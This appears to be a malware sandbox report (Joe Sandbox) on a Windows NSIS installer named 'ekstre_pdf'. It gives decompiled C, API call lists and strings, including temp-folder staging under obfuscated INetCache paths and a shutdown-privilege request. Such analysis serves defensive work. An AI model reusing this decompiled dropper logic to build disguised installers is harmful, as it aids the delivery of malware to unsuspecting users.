														_push(0x80040002);
														_push(0x25);
														_push(_t189);
														_push(_t189);
														_push(_t189);
														if( *_t124() == 0) {
															L76:
															E0040140B(9);
															goto L77;
														}
														goto L75;
													}
												}
												E00405B9D(_v8, 0x200010);
												ExitProcess(2);
											}
											if( *0x47af1c == _t189) {
												L51:
												 *0x47afac =  *0x47afac | 0xffffffff;
												_v24 = E00403BEC(_t265);
												goto L68;
											}
											_t219 = E00405E39(0x4cc000, _t189);
											if(_t219 < 0x4cc000) {
												L48:
												_t264 = _t219 - 0x4cc000;
												_v8 = L"Error launching installer";
												if(_t219 < 0x4cc000) {
													_t190 = E00405B08(__eflags);
													lstrcatW(0x4e0000, L"~nsu");
													__eflags = _t190;
													if(_t190 != 0) {
														lstrcatW(0x4e0000, "A");
													}
													lstrcatW(0x4e0000, L".tmp");
													_t138 = lstrcmpiW(0x4e0000, 0x4d8000);
													__eflags = _t138;
													if(_t138 == 0) {
														L67:
														_t189 = 0;
														__eflags = 0;
														goto L68;
													} else {
														__eflags = _t190;
														_push(0x4e0000);
														if(_t190 == 0) {
															E00405AEB();
														} else {
															E00405A6E();
														}
														SetCurrentDirectoryW(0x4e0000);
														__eflags = L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Dialectical\\Kombinationsuddannelserne\\Chronogramme"; // 0x43
														if(__eflags == 0) {
															E0040653D(L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Dialectical\\Kombinationsuddannelserne\\Chronogramme", 0x4d8000);
														}
														E0040653D(0x47c000, _v16);
														_t202 = "A" & 0x0000ffff;
														_t144 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
														__eflags = _t144;
														_v12 = 0x1a;
														 *0x480000 = _t144;
														do {
															E0040657A(0, 0x43c228, 0x4e0000, 0x43c228,  *((intOrPtr*)( *0x47af10 + 0x120)));
															DeleteFileW(0x43c228);
															__eflags = _v8;
															if(_v8 != 0) {
																_t149 = CopyFileW(0x4e8000, 0x43c228, "true");
																__eflags = _t149;
																if(_t149 != 0) {
																	E004062FD(_t202, 0x43c228, 0);
																	E0040657A(0, 0x43c228, 0x4e0000, 0x43c228,  *((intOrPtr*)( *0x47af10 + 0x124)));
																	_t153 = E00405B20(0x43c228);
																	__eflags = _t153;
																	if(_t153 != 0) {
																		CloseHandle(_t153);
																		_v8 = 0;
																	}
																}
															}
															 *0x480000 =  *0x480000 + 1;
															_t61 =  &_v12;
															 *_t61 = _v12 - 1;
															__eflags =  *_t61;
														} while ( *_t61 != 0);
														E004062FD(_t202, 0x4e0000, 0);
														goto L67;
													}
												}
												 *_t219 = _t189;
												_t222 =  &(_t219[2]);
												_t158 = E00405F14(_t264,  &(_t219[2]));
												_t265 = _t158;
												if(_t158 == 0) {
													goto L68;
												}
												E0040653D(L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Dialectical\\Kombinationsuddannelserne\\Chronogramme", _t222);
												E0040653D(L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Dialectical\\Kombinationsuddannelserne\\Chronogramme\\Eksamenskvotientens144\\Nephrosclerosis\\Dingwall", _t222);
												_v8 = _t189;
												goto L51;
											}
											asm("cdq");
											asm("cdq");
											asm("cdq");
											_t205 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
											_t168 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t210 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
											while( *_t219 != _t205 || _t219[1] != _t168) {
												_t219 = _t219;
												if(_t219 >= 0x4cc000) {
													continue;
												}
												break;
											}
											_t189 = 0;
											goto L48;
										}
										GetWindowsDirectoryW(0x4e0000, 0x1ffb);
										lstrcatW(0x4e0000, L"\\Temp");
										_t171 = E004034FC(_t199, _t253);
										_t254 = _t171;
										if(_t171 != 0) {
											goto L40;
										}
										GetTempPathW(0x1ffc, 0x4e0000);
										lstrcatW(0x4e0000, L"Low");
										SetEnvironmentVariableW(L"TEMP", 0x4e0000);
										SetEnvironmentVariableW(L"TMP", 0x4e0000);
										_t176 = E004034FC(_t199, _t254);
										_t255 = _t176;
										if(_t176 == 0) {
											goto L68;
										}
										goto L40;
									}
									goto L31;
								}
								__eflags =  *((intOrPtr*)(_t199 + 4)) - _t227;
								if( *((intOrPtr*)(_t199 + 4)) != _t227) {
									goto L29;
								}
								_t178 =  *((intOrPtr*)(_t199 + 8));
								__eflags = _t178 - 0x20;
								if(_t178 == 0x20) {
									L28:
									_t36 =  &_v20;
									 *_t36 = _v20 | 0x00000004;
									__eflags =  *_t36;
									goto L29;
								}
								__eflags = _t178 - _t189;
								if(_t178 != _t189) {
									goto L29;
								}
								goto L28;
							}
							_t179 =  *((intOrPtr*)(_t199 + 2));
							__eflags = _t179 - _t210;
							if(_t179 == _t210) {
								L23:
								 *0x47afa0 = 1;
								goto L24;
							}
							__eflags = _t179 - _t189;
							if(_t179 != _t189) {
								goto L24;
							}
							goto L23;
						}
					} else {
						goto L16;
					}
					do {
						L16:
						_t199 = _t199 + 2;
						__eflags =  *_t199 - _t210;
					} while ( *_t199 == _t210);
					goto L17;
				}
				goto L37;
			}

0x0040353b
0x0040353c
0x00403543
0x00403546
0x0040354d
0x00403550
0x00403563
0x00403569
0x0040356c
0x0040356f
0x0040357d
0x00403585
0x00403590
0x004035a9
0x004035ab
0x004035b3
0x004035b3
0x004035be
0x004035c0
0x004035c0
0x004035d5
0x004035fa
0x00403608
0x0040360b
0x00403612
0x00403619
0x00403619
0x00403612
0x0040361b
0x00403620
0x00403621
0x0040362d
0x00403631
0x00403638
0x00403646
0x0040364b
0x00403652
0x00403656
0x0040365a
0x0040365c
0x0040365c
0x0040365a
0x00403663
0x0040366a
0x00403670
0x00403688
0x00403698
0x004036aa
0x004036b1
0x004036b3
0x004036b4
0x004036c5
0x004036c9
0x004036c9
0x004036dc
0x004036de
0x004037d8
0x004037d8
0x004037db
0x004037de
0x00000000
0x00000000
0x004036e8
0x004036e9
0x004036ec
0x004036f5
0x004036f5
0x004036f8
0x004036fb
0x004036fe
0x00403701
0x00403701
0x00403701
0x00403702
0x00403706
0x004037c6
0x004037cf
0x004037d1
0x004037d4
0x004037d7
0x004037d7
0x004037d7
0x00000000
0x0040370c
0x0040370d
0x0040370e
0x00403712
0x0040372c
0x00403733
0x00403746
0x00403747
0x0040375c
0x00403761
0x00403763
0x00403765
0x00403781
0x00403788
0x0040379b
0x0040379c
0x004037b1
0x004037b7
0x004037b9
0x004037bb
0x004037c3
0x004037c5
0x00000000
0x004037c5
0x004037bf
0x004037c1
0x004037e6
0x004037ea
0x004037f3
0x004037f8
0x00403809
0x0040380b
0x00403810
0x00403812
0x0040386a
0x0040386f
0x00403878
0x0040387f
0x00403882
0x00403a59
0x00403a59
0x00403a5e
0x00403a67
0x00403a84
0x00403afc
0x00403afc
0x00403b04
0x00403b06
0x00403b06
0x00403b0c
0x00403b0c
0x00403a9b
0x00403aa7
0x00403ab8
0x00403abf
0x00403ac6
0x00403ac6
0x00403ace
0x00403ada
0x00403ae8
0x00403af3
0x00000000
0x00000000
0x00000000
0x00403adc
0x00403adc
0x00403add
0x00403adf
0x00403ae0
0x00403ae1
0x00403ae6
0x00403af5
0x00403af7
0x00000000
0x00403af7
0x00000000
0x00403ae6
0x00403ada
0x00403a71
0x00403a78
0x00403a78
0x0040388e
0x00403935
0x00403935
0x00403941
0x00000000
0x00403941
0x0040389f
0x004038a7
0x004038f9
0x004038f9
0x004038ff
0x00403906
0x00403954
0x00403956
0x0040395b
0x0040395d
0x00403965
0x00403965
0x00403970
0x0040397c
0x00403982
0x00403984
0x00403a57
0x00403a57
0x00403a57
0x00000000
0x0040398a
0x0040398a
0x0040398c
0x0040398d
0x00403996
0x0040398f
0x0040398f
0x0040398f
0x0040399c
0x004039a4
0x004039ab
0x004039b3
0x004039b3
0x004039c0
0x004039cc
0x004039d6
0x004039d6
0x004039d8
0x004039df
0x004039e9
0x004039f5
0x004039fb
0x00403a01
0x00403a04
0x00403a0e
0x00403a14
0x00403a16
0x00403a1a
0x00403a2b
0x00403a31
0x00403a36
0x00403a38
0x00403a3b
0x00403a41
0x00403a41
0x00403a38
0x00403a16
0x00403a44
0x00403a4b
0x00403a4b
0x00403a4b
0x00403a4b
0x00403a52
0x00000000
0x00403a52
0x00403984
0x00403908
0x0040390b
0x0040390f
0x00403914
0x00403916
0x00000000
0x00000000
0x00403922
0x0040392d
0x00403932
0x00000000
0x00403932
0x004038b0
0x004038c8
0x004038d9
0x004038da
0x004038de
0x004038e0
0x004038ee
0x004038f5
0x00000000
0x00000000
0x00000000
0x004038f5
0x004038f7
0x00000000
0x004038f7
0x0040381a
0x00403826
0x0040382b
0x00403830
0x00403832
0x00000000
0x00000000
0x0040383a
0x00403842
0x00403853
0x0040385b
0x0040385d
0x00403862
0x00403864
0x00000000
0x00000000
0x00000000
0x00403864
0x00000000
0x004037c1
0x0040376a
0x0040376c
0x00000000
0x00000000
0x0040376e
0x00403772
0x00403776
0x0040377d
0x0040377d
0x0040377d
0x0040377d
0x00000000
0x0040377d
0x00403778
0x0040377b
0x00000000
0x00000000
0x00000000
0x0040377b
0x00403714
0x00403718
0x0040371b
0x00403722
0x00403722
0x00000000
0x00403722
0x0040371d
0x00403720
0x00000000
0x00000000
0x00000000
0x00403720
0x00000000
0x00000000
0x00000000
0x004036ee
0x004036ee
0x004036ef
0x004036f0
0x004036f0
0x00000000
0x004036ee
0x00000000

APIs

SetErrorMode.KERNELBASE(00008001), ref: 00403550
GetVersionExW.KERNEL32(?), ref: 00403579
GetVersionExW.KERNEL32(0000011C), ref: 00403590
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403627
#17.COMCTL32(00000007,00000009,0000000B), ref: 00403663
OleInitialize.OLE32(00000000), ref: 0040366A
SHGetFileInfoW.SHELL32(00440228,00000000,?,000002B4,00000000), ref: 00403688
GetCommandLineW.KERNEL32(00472F00,NSIS Error), ref: 0040369D
CharNextW.USER32(00000000,004CC000,00000020,004CC000,00000000), ref: 004036D6
GetTempPathW.KERNEL32(00002000,004E0000,00000000,?), ref: 00403809
GetWindowsDirectoryW.KERNEL32(004E0000,00001FFB), ref: 0040381A
lstrcatW.KERNEL32(004E0000,\Temp), ref: 00403826
GetTempPathW.KERNEL32(00001FFC,004E0000,004E0000,\Temp), ref: 0040383A
lstrcatW.KERNEL32(004E0000,Low), ref: 00403842
SetEnvironmentVariableW.KERNEL32(TEMP,004E0000,004E0000,Low), ref: 00403853
SetEnvironmentVariableW.KERNEL32(TMP,004E0000), ref: 0040385B
DeleteFileW.KERNELBASE(004DC000), ref: 0040386F
lstrcatW.KERNEL32(004E0000,~nsu), ref: 00403956
lstrcatW.KERNEL32(004E0000,0040A26C), ref: 00403965

Part of subcall function 00405AEB: CreateDirectoryW.KERNELBASE(?,00000000,00403520,004E0000,004E0000,004E0000,004E0000,004E0000,00403810), ref: 00405AF1

lstrcatW.KERNEL32(004E0000,.tmp), ref: 00403970
lstrcmpiW.KERNEL32(004E0000,004D8000,004E0000,.tmp,004E0000,~nsu,004CC000,00000000,?), ref: 0040397C
SetCurrentDirectoryW.KERNEL32(004E0000,004E0000), ref: 0040399C
DeleteFileW.KERNEL32(0043C228,0043C228,?,0047C000,?), ref: 004039FB
CopyFileW.KERNEL32(004E8000,0043C228,?), ref: 00403A0E
CloseHandle.KERNEL32(00000000,0043C228,0043C228,?,0043C228,00000000), ref: 00403A3B
OleUninitialize.OLE32(?), ref: 00403A5E
ExitProcess.KERNEL32 ref: 00403A78
GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A8C
OpenProcessToken.ADVAPI32(00000000), ref: 00403A93
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA7
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403AC6
ExitWindowsEx.USER32(00000002,80040002), ref: 00403AEB
ExitProcess.KERNEL32 ref: 00403B0C

Strings

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Dialectical\Kombinationsuddannelserne\Chronogramme\Eksamenskvotientens14, xrefs: 00403928
Error launching installer, xrefs: 004038FF
Low, xrefs: 0040383C
~nsu, xrefs: 0040394E
TEMP, xrefs: 0040384E
.tmp, xrefs: 0040396A
\Temp, xrefs: 00403820
UXTHEME, xrefs: 0040361B, 00403620, 00403626
NSIS Error, xrefs: 0040368E
SeShutdownPrivilege, xrefs: 00403AA1
TMP, xrefs: 00403856
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Dialectical\Kombinationsuddannelserne\Chronogramme, xrefs: 004037EE, 0040391D, 004039A4, 004039AE

Memory Dump Source

Source File: 00000000.00000002.3001752822.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3001707917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001818113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000568000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3002524444.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre_pdf.jbxd

Similarity

API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
String ID: .tmp$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Dialectical\Kombinationsuddannelserne\Chronogramme$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Dialectical\Kombinationsuddannelserne\Chronogramme\Eksamenskvotientens14$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 3859024572-2351792985
Opcode ID: 87e2d66d9f12527481494341e91f2d9f8a5c24b8c56c409e5d4f3428f6665596
Instruction ID: f678a3f77c2c15017f575f6d05e4de9bcbc054aa1a1edf2053beddd194cdfce6
Opcode Fuzzy Hash: 87e2d66d9f12527481494341e91f2d9f8a5c24b8c56c409e5d4f3428f6665596
Instruction Fuzzy Hash: CBE10970A00214AAD710AFB59D45BAF3AB8EF44709F10847FF545B22D1DB7D8A41CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 004056DE Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E004056DE(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				intOrPtr _t119;
				void* _t127;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x472ee4;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						_t127 = CreateThread(0, 0, E00405672, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
						CloseHandle(_t127); // executed
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E0040657A(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x450268;
								_v44 = 0x8000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x472ecc == _t156) {
							ShowWindow( *0x47af08, 8);
							if( *0x47af8c == _t156) {
								_t119 =  *0x448240; // 0x66d114
								E0040559F( *((intOrPtr*)(_t119 + 0x34)), _t156);
							}
							E00404472(_t171);
							goto L25;
						}
						 *0x444238 = 2;
						E00404472(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E00404500(_a8, _a12, _a16);
						}
						ShowWindow( *0x472ed0, _t156);
						ShowWindow(_t169, 8);
						E004044CE(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x47af10;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x472ed0 = GetDlgItem(_a4, 0x403);
				 *0x472ec8 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x472ee4 = _t134;
				_v8 = _t134;
				E004044CE( *0x472ed0);
				 *0x472ed4 = E00404E27(4);
				 *0x472eec = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60); // executed
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00404499(_a4);
				if(( *0x47af18 & 0x00000003) != 0) {
					ShowWindow( *0x472ed0, _t156);
					if(( *0x47af18 & 0x00000002) != 0) {
						 *0x472ed0 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E004044CE( *0x472ec8);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x47af18 & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}

0x004056e6
0x004056ec
0x004056f6
0x004056f9
0x0040588f
0x004058ac
0x004058b3
0x004058b3
0x004058c6
0x004058e4
0x004058e6
0x004058ee
0x00405944
0x00405948
0x00000000
0x00000000
0x0040594a
0x00405950
0x00000000
0x00000000
0x0040595a
0x00405962
0x00405965
0x00405a67
0x00000000
0x00405a67
0x00405974
0x0040597f
0x00405988
0x00405993
0x00405996
0x0040599f
0x004059a5
0x004059a8
0x004059a8
0x004059c0
0x004059c9
0x004059cc
0x004059d3
0x004059da
0x004059e2
0x004059e2
0x004059f9
0x004059f9
0x00405a00
0x00405a06
0x00405a12
0x00405a19
0x00405a22
0x00405a24
0x00405a27
0x00405a36
0x00405a39
0x00405a3f
0x00405a40
0x00405a46
0x00405a47
0x00405a48
0x00405a50
0x00405a5b
0x00405a61
0x00405a61
0x00000000
0x004059c0
0x004058f6
0x00405926
0x0040592e
0x00405930
0x00405939
0x00405939
0x0040593f
0x00000000
0x0040593f
0x004058fa
0x00405904
0x00000000
0x004058c8
0x004058ce
0x00405909
0x00000000
0x00405912
0x004058d7
0x004058dc
0x004058df
0x00000000
0x004058df
0x004058c6
0x004056ff
0x00405703
0x0040570b
0x0040570f
0x00405712
0x00405715
0x00405718
0x0040571b
0x0040571c
0x0040571d
0x00405736
0x00405739
0x00405743
0x00405752
0x0040575a
0x00405762
0x00405767
0x0040576a
0x00405776
0x0040577f
0x00405788
0x004057aa
0x004057b0
0x004057c1
0x004057c6
0x004057d4
0x004057e2
0x004057e2
0x004057e7
0x004057f5
0x004057f5
0x004057fa
0x004057fd
0x00405802
0x0040580e
0x00405817
0x00405824
0x00405833
0x00405826
0x0040582b
0x0040582b
0x0040583f
0x0040583f
0x00405853
0x0040585c
0x00405865
0x00405875
0x00405881
0x00405881
0x00000000

APIs

GetDlgItem.USER32(?,00000403), ref: 0040573C
GetDlgItem.USER32(?,000003EE), ref: 0040574B
GetClientRect.USER32(?,?), ref: 00405788
GetSystemMetrics.USER32(00000002), ref: 0040578F
SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B0
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C1
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057D4
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E2
SendMessageW.USER32(?,00001024,00000000,?), ref: 004057F5
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405817
ShowWindow.USER32(?,00000008), ref: 0040582B
GetDlgItem.USER32(?,000003EC), ref: 0040584C
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040585C
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405875
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405881
GetDlgItem.USER32(?,000003F8), ref: 0040575A

Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,?,004042F9), ref: 004044DC

GetDlgItem.USER32(?,000003EC), ref: 0040589E
CreateThread.KERNEL32(00000000,00000000,Function_00005672,00000000), ref: 004058AC
CloseHandle.KERNELBASE(00000000), ref: 004058B3
ShowWindow.USER32(00000000), ref: 004058D7
ShowWindow.USER32(?,00000008), ref: 004058DC
ShowWindow.USER32(00000008), ref: 00405926
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040595A
CreatePopupMenu.USER32 ref: 0040596B
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040597F
GetWindowRect.USER32(?,?), ref: 0040599F
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059B8
SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F0
OpenClipboard.USER32(00000000), ref: 00405A00
EmptyClipboard.USER32 ref: 00405A06
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A12
GlobalLock.KERNEL32(00000000), ref: 00405A1C
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A30
GlobalUnlock.KERNEL32(00000000), ref: 00405A50
SetClipboardData.USER32(0000000D,00000000), ref: 00405A5B
CloseClipboard.USER32 ref: 00405A61

Strings

{, xrefs: 00405944

Memory Dump Source

Source File: 00000000.00000002.3001752822.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3001707917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001818113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000568000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3002524444.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre_pdf.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: 3fc7505c94557629574781f1e5035c628beed0331193e3212772ac92b4ee254e
Instruction ID: 70c3f5a3b3d199d928f97d47010d117fa70f38a72fdf7c42cc25900ce6ecee1b
Opcode Fuzzy Hash: 3fc7505c94557629574781f1e5035c628beed0331193e3212772ac92b4ee254e
Instruction Fuzzy Hash: 7EB13AB1900608FFDB119FA0DE89AAE7B79FB44354F10803AFA45B61A0C7754E91DF58

Uniqueness

Uniqueness Score: -1.00%

Function 6ED62351 Relevance: 18.7, APIs: 12, Instructions: 705
stringlibrarymemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E6ED62351() {
				void _v4;
				void* _v8;
				signed short _v12;
				signed int _v16;
				WCHAR* _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				void* _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				void* _v60;
				short* _t243;
				signed short* _t245;
				signed int _t246;
				signed int _t250;
				void* _t256;
				struct HINSTANCE__* _t257;
				signed int _t258;
				signed int _t260;
				void* _t261;
				signed short _t263;
				signed int _t267;
				void* _t268;
				signed int* _t269;
				void* _t280;
				signed int _t281;
				signed int _t282;
				signed int _t284;
				signed int _t287;
				void* _t289;
				signed int _t290;
				void* _t294;
				signed int _t295;
				signed short* _t296;
				void* _t299;
				signed int _t306;
				signed int _t307;
				signed int _t311;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				short* _t320;
				signed int _t321;
				signed short* _t325;
				signed int _t327;
				WCHAR* _t328;
				signed short* _t329;
				signed int _t341;
				void* _t343;
				signed int _t344;
				signed int _t345;
				signed int _t346;
				void* _t349;
				signed int _t350;
				signed int _t352;
				signed int _t354;
				signed int _t355;
				void* _t356;
				void* _t357;
				void* _t358;
				void* _t359;
				signed int _t365;
				signed int _t370;
				void* _t371;
				signed int _t378;
				signed int _t379;
				signed int _t380;
				void* _t381;
				signed short* _t383;
				void* _t384;
				void* _t386;
				signed short* _t387;
				short* _t388;
				WCHAR* _t389;
				WCHAR* _t390;
				struct HINSTANCE__* _t391;
				signed int _t393;
				signed int _t394;
				signed short _t395;
				void _t396;
				void* _t398;
				void* _t403;
				signed int _t405;
				signed int _t407;
				signed int _t409;

				_t394 = 0;
				_v32 = 0;
				_v52 = 0;
				_t386 = 0;
				_v28 = 0;
				_v56 = 0;
				_v24 = 0;
				_v16 = 0;
				_v36 = 0;
				_t243 = E6ED612F8();
				_v40 = _t243;
				_t320 = _t243;
				_v20 = E6ED612F8();
				_t245 = E6ED61593();
				_t325 = _t245;
				_v8 = _t245;
				_v60 = _t325;
				_t387 = _t245;
				_v44 = _t325;
				_v4 = 2;
				while(1) {
					_t378 = _t394;
					if(_t394 != 0 && _t386 == 0) {
						break;
					}
					_t395 =  *_t325 & 0x0000ffff;
					_t246 = _t395 & 0x0000ffff;
					_v12 = _t395;
					_t327 = _t246;
					if(_t327 == 0) {
						_t175 =  &_v52;
						 *_t175 = _v52 | 0xffffffff;
						__eflags =  *_t175;
						L132:
						_t396 = _v32;
						L133:
						_t379 = _t378;
						if(_t379 == 0) {
							 *_t320 = 0;
							__eflags = _t386;
							if(_t386 != 0) {
								_t380 = 0;
								__eflags = 0;
							} else {
								_t289 = GlobalAlloc(0x40, 0x1ca4); // executed
								_t386 = _t289;
								_t380 = 0;
